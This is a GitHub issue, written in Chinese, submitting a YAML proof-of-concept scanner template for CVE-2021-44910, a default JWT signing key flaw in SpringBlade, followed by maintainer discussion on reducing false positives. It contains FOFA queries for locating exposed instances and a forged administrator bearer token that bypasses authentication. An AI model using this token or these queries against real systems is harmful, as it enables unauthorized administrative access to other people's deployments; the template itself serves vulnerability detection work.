Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-44910 #124

Open
leonardo-o1 opened this issue Apr 26, 2024 · 4 comments
Open

CVE-2021-44910 #124

leonardo-o1 opened this issue Apr 26, 2024 · 4 comments

Comments

@leonardo-o1
Copy link

leonardo-o1 commented Apr 26, 2024

FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
验证:
image

id: CVE-2021-44910  # 身份标识  和文件名一样  冒号后都有空格
 
info:   # poc 信息描述   注意缩进 父子关系  yaml语言和python相似  重视格式
  name: SpringBlade 框架JWT认证缺陷漏洞
  author: leo   #作者
  severity: high    # 漏洞等级 info(信息)、low(低危)、medium(中危)、high(高危)、critical(紧急)
  tags: SpringBlade
  verified: true  # true 漏洞已通过验证,false未验证
  description: |    # # 漏洞描述、测绘等    |是yaml语言 多行换行用法
   SpringBlade 框架jwt存在默认key,可任意篡改登录凭证jwt
   FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
  reference: # 参考 引用的文章
  - https://forum.butian.net/share/973
  - https://github.com/chillzhuang/blade-tool/blob/master/blade-core-launch/src/main/java/org/springblade/core/launch/constant/TokenConstant.java  #  - 插入列表
  - https://github.com/dockererr/CVE-2021-44910_SpringBlade/blob/main/CVE-2021-44910.py
  
rules:  #poc 本体 规则集合
  r0:   # 规则名随便起
    request:  # request 请求
      method: GET  # POST  PUT GET
      path: /api/blade-user/info  #路径  api/blade-user/user-list,api/blade-log/api/list
    expression: response.status == 401 && response.body.bcontains(b'"code":401')

  r1:   # 规则名随便起
    request:  # request 请求
      method: GET  # POST  PUT GET
      path: /api/blade-user/info  #路径  api/blade-user/user-list,api/blade-log/api/list
      headers:
          Blade-Auth: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg
    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"success":true')

expression: r0() && r1()  
@zan8in
Copy link
Owner

zan8in commented Apr 26, 2024

感谢,不过你的 expression 判断过于简单,容易误报,下次再增加一些唯一性验证会更好。

@leonardo-o1
Copy link
Author

leonardo-o1 commented Apr 26, 2024

感谢,不过你的 expression 判断过于简单,容易误报,下次再增加一些唯一性验证会更好。

好的,添加了认证前访问401的判断,再看下呢

@zan8in
Copy link
Owner

zan8in commented Apr 26, 2024

不错的办法,这个漏洞之前写过,现已上传到github,你看下是否需要把你的poc 合并进去

@ViCrack
Copy link

ViCrack commented Apr 26, 2024

不用加认证前访问的判断吧,节省发包量,按照这个图来说,因为返回的json结构字段比较多,所以增加字段特征应该就足够了

      - '"success":true'
      - '"account":'
      - '"password":'
      - createDept
      - xxxxxxx
      - xxxxxxxx

图片

nuclei也有这个的yaml

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants